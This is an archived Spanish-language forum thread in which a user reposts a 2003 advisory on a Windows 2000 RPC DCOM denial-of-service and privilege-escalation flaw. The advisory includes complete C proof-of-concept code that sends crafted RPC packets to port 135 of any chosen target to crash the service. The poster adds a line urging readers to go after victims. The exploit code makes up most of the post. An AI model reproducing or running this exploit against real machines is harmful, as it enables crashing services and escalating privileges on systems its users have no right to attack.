PDA

Ver la versión completa : Win2k (esclar privilegios)



NeoGenessis
28-07-2003, 10:26
He encontrado una paguina interesante, que avisa de una importante vulnerabilidad de win2k que puede permitir control total de la maquina. La noticia en ingles es:

Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability

Create: 2003-07-25
Author: flashsky (flashsky1_at_sina.com)

1.Description:
There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages.
By sending a malformed messages to DCOM __RemoteGetClassObject interface,The RPC Service will be crashed,and all service and application depending on RPC service will be abnormal.
If attacker have an account ,he can hijack epmapper pipe and 135 port Privilege Escalation after RPC service is crash.

2.Affected Systems:Windows 2000 +SP3
Windows 2000 +SP4+

3.Proof of concept codes:


#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00, 0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00, 0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C, 0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00, 0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



void main(int argc,char ** argv)
{
WSADATA WSAData;
int i;
SOCKET sock;
SOCKADDR_IN addr_in;

short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfo cus.org\n");
printf("Welcome to http://www.xfocus.net\n");
if(argc<2)
{
printf("useage:%s target\n",argv[0]);
exit(1);
}


if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==I NVALID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCK ET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERRO R)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}

i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERRO R)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}
5.About XFOCUS.ORG
Xfocus is a non-profit and free technology organization which was founded in 1998 in China. We are devoting to research and demonstration of weaknesses related to network services and communication security.
We hope that we can use new technical tools to achieve our goal, and to broaden our outlook. We also hope we can communicate and help with each other through this amazing Internet.
This site is created for publishing some documents , codes and utilities of our research work. Any suggestions are welcome , please contact us at webmaster_at_xfocus.org .
From the Internet. For the Internet. Have fun!


No seais muy malos. y a por ellos que son pocos!!!

Dragonety
04-08-2003, 19:30
No he estudiado el codigo, pero parece que lo que haces es acceder alguno de los servicios de los puertos TCP o UDP con sockets, pero por otro lado parece que es para ejecutarse directamente en la maquina local.
Ya podian estar los comentarios en el idioma de Cervantes.